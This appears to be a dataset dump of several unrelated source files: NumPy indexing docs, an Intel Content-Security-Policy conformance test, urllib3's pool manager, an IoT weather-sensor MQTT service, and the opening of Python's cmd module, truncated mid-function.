assignments, the np.newaxis object can be used within array indices
to add new dimensions with a size of 1. For example: ::
>>> y.shape
(5, 7)
>>> y[:,np.newaxis,:].shape
(5, 1, 7)
Note that there are no new elements in the array, just that the
dimensionality is increased. This can be handy to combine two
arrays in a way that otherwise would require explicitly reshaping
operations. For example: ::
>>> x = np.arange(5)
>>> x[:,np.newaxis] + x[np.newaxis,:]
array([[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 5, 6],
[3, 4, 5, 6, 7],
[4, 5, 6, 7, 8]])
The ellipsis syntax may be used to indicate selecting in full any
remaining unspecified dimensions. For example: ::
>>> z = np.arange(81).reshape(3,3,3,3)
>>> z[1,...,2]
array([[29, 32, 35],
[38, 41, 44],
[47, 50, 53]])
This is equivalent to: ::
>>> z[1,:,:,2]
array([[29, 32, 35],
[38, 41, 44],
[47, 50, 53]])
Assigning values to indexed arrays
==================================
As mentioned, one can select a subset of an array to assign to using
a single index, slices, and index and mask arrays. The value being
assigned to the indexed array must be shape consistent (the same shape
or broadcastable to the shape the index produces). For example, it is
permitted to assign a constant to a slice: ::
>>> x = np.arange(10)
>>> x[2:7] = 1
or an array of the right size: ::
>>> x[2:7] = np.arange(5)
Note that assignments may result in changes if assigning
higher types to lower types (like floats to ints) or even
exceptions (assigning complex to floats or ints): ::
>>> x[1] = 1.2
>>> x[1]
1
>>> x[1] = 1.2j
<type 'exceptions.TypeError'>: can't convert complex to long; use
long(abs(z))
Unlike some of the references (such as array and mask indices)
assignments are always made to the original data in the array
(indeed, nothing else would make sense!). Note though, that some
actions may not work as one may naively expect. This particular
example is often surprising to people: ::
>>> x = np.arange(0, 50, 10)
>>> x
array([ 0, 10, 20, 30, 40])
>>> x[np.array([1, 1, 3, 1])] += 1
>>> x
array([ 0, 11, 20, 31, 40])
Where people expect that the 1st location will be incremented by 3.
In fact, it will only be incremented by 1. The reason is because
a new array is extracted from the original (as a temporary) containing
the values at 1, 1, 3, 1, then the value 1 is added to the temporary,
and then the temporary is assigned back to the original array. Thus
the value of the array at x[1]+1 is assigned to x[1] three times,
rather than being incremented 3 times.
Dealing with variable numbers of indices within programs
========================================================
The index syntax is very powerful but limiting when dealing with
a variable number of indices. For example, if you want to write
a function that can handle arguments with various numbers of
dimensions without having to write special case code for each
number of possible dimensions, how can that be done? If one
supplies to the index a tuple, the tuple will be interpreted
as a list of indices. For example (using the previous definition
for the array z): ::
>>> indices = (1,1,1,1)
>>> z[indices]
40
So one can use code to construct tuples of any number of indices
and then use these within an index.
Slices can be specified within programs by using the slice() function
in Python. For example: ::
>>> indices = (1,1,1,slice(0,2)) # same as [1,1,1,0:2]
>>> z[indices]
array([39, 40])
Likewise, ellipsis can be specified by code by using the Ellipsis
object: ::
>>> indices = (1, Ellipsis, 1) # same as [1,...,1]
>>> z[indices]
array([[28, 31, 34],
[37, 40, 43],
[46, 49, 52]])
For this reason it is possible to use the output from the np.where()
function directly as an index since it always returns a tuple of index
arrays.
Because of the special treatment of tuples, they are not automatically
converted to an array as a list would be. As an example: ::
>>> z[[1,1,1,1]] # produces a large array
array([[[[27, 28, 29],
[30, 31, 32], ...
>>> z[(1,1,1,1)] # returns a single value
40
"""
from __future__ import division, absolute_import, print_function
| agpl-3.0 |
haoxli/web-testing-service | wts/tests/csp/csp_object-src_cross-origin_multi_blocked_int-manual.py | 30 | 2479 | def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "object-src " + url2 + " https://tizen.org"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_object-src_cross-origin_multi_blocked_int</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#object-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
</head>
<body>
<p>Test passes if there is <strong>no red</strong>.</p>
<object data="support/red-100x100.png"/>
</body>
</html> """
| bsd-3-clause |
huguesv/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_vendor/urllib3/poolmanager.py | 37 | 16853 | from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool
from .connectionpool import port_by_scheme
from .exceptions import LocationValueError, MaxRetryError, ProxySchemeUnknown
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.url import parse_url
from .util.retry import Retry
__all__ = ['PoolManager', 'ProxyManager', 'proxy_from_url']
log = logging.getLogger(__name__)
SSL_KEYWORDS = ('key_file', 'cert_file', 'cert_reqs', 'ca_certs',
'ssl_version', 'ca_cert_dir', 'ssl_context')
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
'key_scheme', # str
'key_host', # str
'key_port', # int
'key_timeout', # int or float or Timeout
'key_retries', # int or Retry
'key_strict', # bool
'key_block', # bool
'key_source_address', # str
'key_key_file', # str
'key_cert_file', # str
'key_cert_reqs', # str
'key_ca_certs', # str
'key_ssl_version', # str
'key_ca_cert_dir', # str
'key_ssl_context', # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
'key_maxsize', # int
'key_headers', # dict
'key__proxy', # parsed proxy url
'key__proxy_headers', # dict
'key_socket_options', # list of (level (int), optname (int), value (int or str)) tuples
'key__socks_options', # dict
'key_assert_hostname', # bool or string
'key_assert_fingerprint', # str
'key_server_hostname', #str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple('PoolKey', _key_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
A dictionary-like object that contain the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context['scheme'] = context['scheme'].lower()
context['host'] = context['host'].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ('headers', '_proxy_headers', '_socks_options'):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get('socket_options')
if socket_opts is not None:
context['socket_options'] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context['key_' + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
'http': functools.partial(_default_key_normalizer, PoolKey),
'https': functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
'http': HTTPConnectionPool,
'https': HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
    """
    Allows for arbitrary requests while transparently keeping track of
    necessary connection pools for you.

    :param num_pools:
        Number of connection pools to cache before discarding the least
        recently used pool.

    :param headers:
        Headers to include with all requests, unless other headers are given
        explicitly.

    :param \\**connection_pool_kw:
        Additional parameters are used to create fresh
        :class:`urllib3.connectionpool.ConnectionPool` instances.

    Example::

        >>> manager = PoolManager(num_pools=2)
        >>> r = manager.request('GET', 'http://google.com/')
        >>> r = manager.request('GET', 'http://google.com/mail')
        >>> r = manager.request('GET', 'http://yahoo.com/')
        >>> len(manager.pools)
        2

    """

    # Overridden by ProxyManager; a non-None value changes how urlopen()
    # addresses plain-HTTP requests (absolute URL instead of request-uri).
    proxy = None

    def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
        RequestMethods.__init__(self, headers)
        self.connection_pool_kw = connection_pool_kw
        # LRU container: evicted pools are closed via dispose_func.
        self.pools = RecentlyUsedContainer(num_pools,
                                           dispose_func=lambda p: p.close())

        # Locally set the pool classes and keys so other PoolManagers can
        # override them.
        self.pool_classes_by_scheme = pool_classes_by_scheme
        self.key_fn_by_scheme = key_fn_by_scheme.copy()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.clear()
        # Return False to re-raise any potential exceptions
        return False

    def _new_pool(self, scheme, host, port, request_context=None):
        """
        Create a new :class:`ConnectionPool` based on host, port, scheme, and
        any additional pool keyword arguments.

        If ``request_context`` is provided, it is provided as keyword arguments
        to the pool class used. This method is used to actually create the
        connection pools handed out by :meth:`connection_from_url` and
        companion methods. It is intended to be overridden for customization.
        """
        pool_cls = self.pool_classes_by_scheme[scheme]
        if request_context is None:
            request_context = self.connection_pool_kw.copy()

        # Although the context has everything necessary to create the pool,
        # this function has historically only used the scheme, host, and port
        # in the positional args. When an API change is acceptable these can
        # be removed.
        for key in ('scheme', 'host', 'port'):
            request_context.pop(key, None)

        if scheme == 'http':
            # TLS-only keyword arguments make no sense for a plain HTTP pool.
            for kw in SSL_KEYWORDS:
                request_context.pop(kw, None)

        return pool_cls(host, port, **request_context)

    def clear(self):
        """
        Empty our store of pools and direct them all to close.

        This will not affect in-flight connections, but they will not be
        re-used after completion.
        """
        self.pools.clear()

    def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
        """
        Get a :class:`ConnectionPool` based on the host, port, and scheme.

        If ``port`` isn't given, it will be derived from the ``scheme`` using
        ``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
        provided, it is merged with the instance's ``connection_pool_kw``
        variable and used to create the new connection pool, if one is
        needed.
        """

        if not host:
            raise LocationValueError("No host specified.")

        request_context = self._merge_pool_kwargs(pool_kwargs)
        request_context['scheme'] = scheme or 'http'
        if not port:
            # Fall back to the scheme's well-known port (default 80).
            port = port_by_scheme.get(request_context['scheme'].lower(), 80)
        request_context['port'] = port
        request_context['host'] = host

        return self.connection_from_context(request_context)

    def connection_from_context(self, request_context):
        """
        Get a :class:`ConnectionPool` based on the request context.

        ``request_context`` must at least contain the ``scheme`` key and its
        value must be a key in ``key_fn_by_scheme`` instance variable.
        """
        scheme = request_context['scheme'].lower()
        pool_key_constructor = self.key_fn_by_scheme[scheme]
        pool_key = pool_key_constructor(request_context)

        return self.connection_from_pool_key(pool_key, request_context=request_context)

    def connection_from_pool_key(self, pool_key, request_context=None):
        """
        Get a :class:`ConnectionPool` based on the provided pool key.

        ``pool_key`` should be a namedtuple that only contains immutable
        objects. At a minimum it must have the ``scheme``, ``host``, and
        ``port`` fields.
        """
        # Lock so concurrent callers cannot race to create duplicate pools
        # for the same key.
        with self.pools.lock:
            # If the scheme, host, or port doesn't match existing open
            # connections, open a new ConnectionPool.
            pool = self.pools.get(pool_key)
            if pool:
                return pool

            # Make a fresh ConnectionPool of the desired type
            scheme = request_context['scheme']
            host = request_context['host']
            port = request_context['port']
            pool = self._new_pool(scheme, host, port, request_context=request_context)
            self.pools[pool_key] = pool

        return pool

    def connection_from_url(self, url, pool_kwargs=None):
        """
        Similar to :func:`urllib3.connectionpool.connection_from_url`.

        If ``pool_kwargs`` is not provided and a new pool needs to be
        constructed, ``self.connection_pool_kw`` is used to initialize
        the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
        is provided, it is used instead. Note that if a new pool does not
        need to be created for the request, the provided ``pool_kwargs`` are
        not used.
        """
        u = parse_url(url)
        return self.connection_from_host(u.host, port=u.port, scheme=u.scheme,
                                         pool_kwargs=pool_kwargs)

    def _merge_pool_kwargs(self, override):
        """
        Merge a dictionary of override values for self.connection_pool_kw.

        This does not modify self.connection_pool_kw and returns a new dict.
        Any keys in the override dictionary with a value of ``None`` are
        removed from the merged dictionary.
        """
        base_pool_kwargs = self.connection_pool_kw.copy()
        if override:
            for key, value in override.items():
                if value is None:
                    # A None override deletes the key rather than storing None.
                    try:
                        del base_pool_kwargs[key]
                    except KeyError:
                        pass
                else:
                    base_pool_kwargs[key] = value
        return base_pool_kwargs

    def urlopen(self, method, url, redirect=True, **kw):
        """
        Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`
        with custom cross-host redirect logic and only sends the request-uri
        portion of the ``url``.

        The given ``url`` parameter must be absolute, such that an appropriate
        :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
        """
        u = parse_url(url)
        conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)

        # Redirects are handled here (possibly across hosts), not by the pool.
        kw['assert_same_host'] = False
        kw['redirect'] = False

        if 'headers' not in kw:
            kw['headers'] = self.headers.copy()

        if self.proxy is not None and u.scheme == "http":
            # Plain HTTP through a proxy requires the absolute URL.
            response = conn.urlopen(method, url, **kw)
        else:
            response = conn.urlopen(method, u.request_uri, **kw)

        redirect_location = redirect and response.get_redirect_location()
        if not redirect_location:
            return response

        # Support relative URLs for redirecting.
        redirect_location = urljoin(url, redirect_location)

        # RFC 7231, Section 6.4.4
        if response.status == 303:
            method = 'GET'

        retries = kw.get('retries')
        if not isinstance(retries, Retry):
            retries = Retry.from_int(retries, redirect=redirect)

        # Strip headers marked as unsafe to forward to the redirected location.
        # Check remove_headers_on_redirect to avoid a potential network call within
        # conn.is_same_host() which may use socket.gethostbyname() in the future.
        if (retries.remove_headers_on_redirect
                and not conn.is_same_host(redirect_location)):
            for header in retries.remove_headers_on_redirect:
                kw['headers'].pop(header, None)

        try:
            retries = retries.increment(method, url, response=response, _pool=conn)
        except MaxRetryError:
            if retries.raise_on_redirect:
                raise
            # Retries exhausted and raising is disabled: hand back the
            # redirect response itself.
            return response

        kw['retries'] = retries
        kw['redirect'] = redirect

        log.info("Redirecting %s -> %s", url, redirect_location)
        # Recurse to follow the redirect with the updated retry budget.
        return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
    """
    Behaves just like :class:`PoolManager`, but sends all requests through
    the defined proxy, using the CONNECT method for HTTPS URLs.

    :param proxy_url:
        The URL of the proxy to be used.

    :param proxy_headers:
        A dictionary containing headers that will be sent to the proxy. In case
        of HTTP they are being sent with each request, while in the
        HTTPS/CONNECT case they are sent only once. Could be used for proxy
        authentication.

    Example:
        >>> proxy = urllib3.ProxyManager('http://localhost:3128/')
        >>> r1 = proxy.request('GET', 'http://google.com/')
        >>> r2 = proxy.request('GET', 'http://httpbin.org/')
        >>> len(proxy.pools)
        1
        >>> r3 = proxy.request('GET', 'https://httpbin.org/')
        >>> r4 = proxy.request('GET', 'https://twitter.com/')
        >>> len(proxy.pools)
        3

    """

    def __init__(self, proxy_url, num_pools=10, headers=None,
                 proxy_headers=None, **connection_pool_kw):

        # Accept an existing pool object in place of a URL string.
        if isinstance(proxy_url, HTTPConnectionPool):
            proxy_url = '%s://%s:%i' % (proxy_url.scheme, proxy_url.host,
                                        proxy_url.port)
        proxy = parse_url(proxy_url)
        if not proxy.port:
            # Default the proxy port from its scheme (falling back to 80).
            port = port_by_scheme.get(proxy.scheme, 80)
            proxy = proxy._replace(port=port)

        if proxy.scheme not in ("http", "https"):
            raise ProxySchemeUnknown(proxy.scheme)

        self.proxy = proxy
        self.proxy_headers = proxy_headers or {}

        # Passed through to every ConnectionPool created by the base class.
        connection_pool_kw['_proxy'] = self.proxy
        connection_pool_kw['_proxy_headers'] = self.proxy_headers

        super(ProxyManager, self).__init__(
            num_pools, headers, **connection_pool_kw)

    def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
        # HTTPS tunnels through the proxy via CONNECT, so the pool is keyed
        # on the destination host; plain HTTP pools connect to the proxy.
        if scheme == "https":
            return super(ProxyManager, self).connection_from_host(
                host, port, scheme, pool_kwargs=pool_kwargs)

        return super(ProxyManager, self).connection_from_host(
            self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs)

    def _set_proxy_headers(self, url, headers=None):
        """
        Sets headers needed by proxies: specifically, the Accept and Host
        headers. Only sets headers not provided by the user.
        """
        headers_ = {'Accept': '*/*'}

        netloc = parse_url(url).netloc
        if netloc:
            headers_['Host'] = netloc

        if headers:
            # User-supplied headers take precedence over the defaults above.
            headers_.update(headers)
        return headers_

    def urlopen(self, method, url, redirect=True, **kw):
        "Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
        u = parse_url(url)

        if u.scheme == "http":
            # For proxied HTTPS requests, httplib sets the necessary headers
            # on the CONNECT to the proxy. For HTTP, we'll definitely
            # need to set 'Host' at the very least.
            headers = kw.get('headers', self.headers)
            kw['headers'] = self._set_proxy_headers(url, headers)

        return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw)
def proxy_from_url(url, **kw):
    """Build a :class:`ProxyManager` for the proxy at ``url``.

    Any extra keyword arguments are forwarded to the ``ProxyManager``
    constructor unchanged.
    """
    manager = ProxyManager(proxy_url=url, **kw)
    return manager
| apache-2.0 |
connectIOT/iottoolkit | old/WeatherSensorMQTTSubscriber.py | 1 | 10322 | '''
Created on July 26, 2013
Example service created for a weather sensor. An Arduino POSTs simple JSON value-only updates to the
REST endpoints defined by the Observable Property created for each sensor output. An example graph is
created to demonstrate how endpoints can be discovered by reading the graph meta data
@author: mjkoster
'''
from core.SmartObject import SmartObject
from core.Description import Description
from core.ObservableProperty import ObservableProperty
from core.Observers import Observers
from core.PropertyOfInterest import PropertyOfInterest
from rdflib.term import Literal, URIRef
from rdflib.namespace import RDF, RDFS, XSD, OWL
from interfaces.HttpObjectService import HttpObjectService
from interfaces.CoapObjectService import CoapObjectService
from time import sleep
import sys
# workaround to register rdf JSON plugins
import rdflib
from rdflib.plugin import Serializer, Parser

# Register JSON-LD and RDF/JSON serializer/parser plugins with rdflib so
# the description graphs built below can be emitted in / read from these
# formats.
rdflib.plugin.register('json-ld', Serializer, 'rdflib_jsonld.serializer', 'JsonLDSerializer')
rdflib.plugin.register('json-ld', Parser, 'rdflib_jsonld.parser', 'JsonLDParser')
rdflib.plugin.register('rdf-json', Serializer, 'rdflib_rdfjson.rdfjson_serializer', 'RdfJsonSerializer')
rdflib.plugin.register('rdf-json', Parser, 'rdflib_rdfjson.rdfjson_parser', 'RdfJsonParser')
if __name__ == '__main__':
    # Make an instance of the HTTP service (default object root, default
    # port 8000) and expose the same resource tree over CoAP as well.
    baseObject = HttpObjectService().baseObject
    coapService = CoapObjectService(baseObject)

    # create the weather station resource template
    # emulate the .well-known/core interface
    baseObject.create({'resourceName': '.well-known', 'resourceClass': 'SmartObject'})\
        .create({'resourceName': 'core', 'resourceClass': 'LinkFormatProxy'})

    # sensors resource under the baseObject for all sensors
    # top level object container for sensors, default class is SmartObject
    sensors = baseObject.create({'resourceName': 'sensors', 'resourceClass': 'SmartObject'})

    # weather resource under sensors for the weather sensor cluster
    weather = sensors.create({'resourceName': 'rhvWeather-01', 'resourceClass': 'SmartObject'})

    # example description in simple link-format like concepts
    baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDFS.Class, Literal('SmartObject')))
    baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDF.type, Literal('SensorSystem')))
    baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDFS.Resource, Literal('Weather')))

    # Every output of the weather sensor, as (resource name, RDFS.Resource
    # label) pairs. Each one is described with RDF.type 'sensor' and gets an
    # ObservableProperty with an MQTT observer attached. Driving the loops
    # below from this table replaces ~120 lines of copy-pasted create/set
    # calls in the original.
    SENSOR_OUTPUTS = [
        ('outdoor_temperature', 'temperature'),
        ('outdoor_humidity', 'humidity'),
        ('sealevel_pressure', 'pressure'),
        ('indoor_temperature', 'temperature'),
        ('indoor_humidity', 'humidity'),
        ('wind_gust', 'speed'),
        ('wind_speed', 'speed'),
        ('wind_direction', 'direction'),
        ('current_rain', 'depth'),
        ('hourly_rain', 'depth'),
        ('daily_rain', 'depth'),
    ]

    # Describe each sensor output in the graph meta data so endpoints can be
    # discovered by reading the graph.
    for sensorName, resourceLabel in SENSOR_OUTPUTS:
        subject = URIRef('sensors/rhvWeather-01/' + sensorName)
        baseObject.Description.set((subject, RDF.type, Literal('sensor')))
        baseObject.Description.set((subject, RDFS.Resource, Literal(resourceLabel)))

    pushInterval = 10  # number of samples to delay each push (currently unused)

    # Now create an Observable Property for each sensor output, each with an
    # MQTT observer publishing to the broker at smartobjectservice.com.
    observableProperties = {}
    for sensorName, resourceLabel in SENSOR_OUTPUTS:
        observableProperty = weather.create({'resourceName': sensorName,
                                             'resourceClass': 'ObservableProperty'})
        observableProperty.Observers.create({'resourceName': 'mqttTestObserver',
                                             'resourceClass': 'mqttObserver',
                                             'connection': 'smartobjectservice.com',
                                             'pubTopic': ''})
        observableProperties[sensorName] = observableProperty

    try:
        # register handlers etc.
        # Idle forever; the services run in the background.
        while 1:
            sleep(1)
    except KeyboardInterrupt:
        pass
    # print() call form works under both Python 2 and Python 3.
    print('got KeyboardInterrupt')
| apache-2.0 |
figment/falloutsnip | Vendor/IronPython/Lib/cmd.py | 86 | 14889 | """A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string

__all__ = ["Cmd"]

# Default interpreter prompt, and the characters accepted as part of a
# command word when parsing an input line (letters, digits, underscore).
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
class Cmd:
    """A simple framework for writing line-oriented command interpreters.

    These are often useful for test harnesses, administrative tools, and
    prototypes that will later be wrapped in a more sophisticated interface.

    A Cmd instance or subclass instance is a line-oriented interpreter
    framework. There is no good reason to instantiate Cmd itself; rather,
    it's useful as a superclass of an interpreter class you define yourself
    in order to inherit Cmd's methods and encapsulate action methods.
    """
    # Class-level defaults; subclasses typically override prompt/intro and
    # the help-listing headers below.
    prompt = PROMPT
    identchars = IDENTCHARS
    ruler = '='          # character used to underline help section headers
    lastcmd = ''         # last nonempty command, replayed on an empty line
    intro = None         # banner printed when cmdloop() starts
    doc_leader = ""
    doc_header = "Documented commands (type help <topic>):"
    misc_header = "Miscellaneous help topics:"
    undoc_header = "Undocumented commands:"
    nohelp = "*** No help on %s"
    use_rawinput = 1     # if true, read via raw_input() (enables readline)

    def __init__(self, completekey='tab', stdin=None, stdout=None):
        """Instantiate a line-oriented interpreter framework.

        The optional argument 'completekey' is the readline name of a
        completion key; it defaults to the Tab key. If completekey is
        not None and the readline module is available, command completion
        is done automatically. The optional arguments stdin and stdout
        specify alternate input and output file objects; if not specified,
        sys.stdin and sys.stdout are used.
        """
        import sys
        if stdin is not None:
            self.stdin = stdin
        else:
            self.stdin = sys.stdin
        if stdout is not None:
            self.stdout = stdout
        else:
            self.stdout = sys.stdout
        self.cmdqueue = []
        self.completekey = completekey

    def cmdloop(self, intro=None):
        """Repeatedly issue a prompt, accept input, parse an initial prefix
        off the received input, and dispatch to action methods, passing them
        the remainder of the line as argument.
        """

        self.preloop()
        if self.use_rawinput and self.completekey:
            # Install our completer, remembering the old one so it can be
            # restored when the loop exits.
            try:
                import readline
                self.old_completer = readline.get_completer()
                readline.set_completer(self.complete)
                readline.parse_and_bind(self.completekey+": complete")
            except ImportError:
                pass
        try:
            if intro is not None:
                self.intro = intro
            if self.intro:
                self.stdout.write(str(self.intro)+"\n")
            stop = None
            while not stop:
                # Queued commands (self.cmdqueue) take priority over input.
                if self.cmdqueue:
                    line = self.cmdqueue.pop(0)
                else:
                    if self.use_rawinput:
                        try:
                            line = raw_input(self.prompt)
                        except EOFError:
                            line = 'EOF'
                    else:
                        self.stdout.write(self.prompt)
                        self.stdout.flush()
                        line = self.stdin.readline()
                        if not len(line):
                            # Empty read means end of stream.
                            line = 'EOF'
                        else:
                            line = line.rstrip('\r\n')
                line = self.precmd(line)
                stop = self.onecmd(line)
                stop = self.postcmd(stop, line)
            self.postloop()
        finally:
            if self.use_rawinput and self.completekey:
                # Restore the previously-installed readline completer.
                try:
                    import readline
                    readline.set_completer(self.old_completer)
                except ImportError:
                    pass

    def precmd(self, line):
        """Hook method executed just before the command line is
        interpreted, but after the input prompt is generated and issued.
        """
        return line

    def postcmd(self, stop, line):
        """Hook method executed just after a command dispatch is finished."""
        return stop

    def preloop(self):
        """Hook method executed once when the cmdloop() method is called."""
        pass

    def postloop(self):
        """Hook method executed once when the cmdloop() method is about to
        return.
        """
        pass

    def parseline(self, line):
        """Parse the line into a command name and a string containing
        the arguments.  Returns a tuple containing (command, args, line).
        'command' and 'args' may be None if the line couldn't be parsed.
        """
        line = line.strip()
        if not line:
            return None, None, line
        elif line[0] == '?':
            # '?' is a synonym for 'help'.
            line = 'help ' + line[1:]
        elif line[0] == '!':
            # '!' is a synonym for 'shell', but only if do_shell exists.
            if hasattr(self, 'do_shell'):
                line = 'shell ' + line[1:]
            else:
                return None, None, line
        # The command word is the longest prefix made of identchars.
        i, n = 0, len(line)
        while i < n and line[i] in self.identchars: i = i+1
        cmd, arg = line[:i], line[i:].strip()
        return cmd, arg, line

    def onecmd(self, line):
        """Interpret the argument as though it had been typed in response
        to the prompt.

        This may be overridden, but should not normally need to be;
        see the precmd() and postcmd() methods for useful execution hooks.
        The return value is a flag indicating whether interpretation of
        commands by the interpreter should stop.
        """
        cmd, arg, line = self.parseline(line)
        if not line:
            return self.emptyline()
        if cmd is None:
            return self.default(line)
        self.lastcmd = line
        if cmd == '':
            return self.default(line)
        else:
            # Dispatch 'foo' to self.do_foo(arg), falling back to default().
            try:
                func = getattr(self, 'do_' + cmd)
            except AttributeError:
                return self.default(line)
            return func(arg)

    def emptyline(self):
        """Called when an empty line is entered in response to the prompt.

        If this method is not overridden, it repeats the last nonempty
        command entered.
        """
        if self.lastcmd:
            return self.onecmd(self.lastcmd)

    def default(self, line):
        """Called on an input line when the command prefix is not recognized.

        If this method is not overridden, it prints an error message and
        returns.
        """
        self.stdout.write('*** Unknown syntax: %s\n'%line)

    def completedefault(self, *ignored):
        """Method called to complete an input line when no command-specific
        complete_*() method is available.

        By default, it returns an empty list.
        """
        return []

    def completenames(self, text, *ignored):
        # Complete a command word against the do_* methods.
        dotext = 'do_'+text
        return [a[3:] for a in self.get_names() if a.startswith(dotext)]

    def complete(self, text, state):
        """Return the next possible completion for 'text'.

        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            # First call for this text: compute all matches and cache them;
            # subsequent calls just index into self.completion_matches.
            import readline
            origline = readline.get_line_buffer()
            line = origline.lstrip()
            stripped = len(origline) - len(line)
            begidx = readline.get_begidx() - stripped
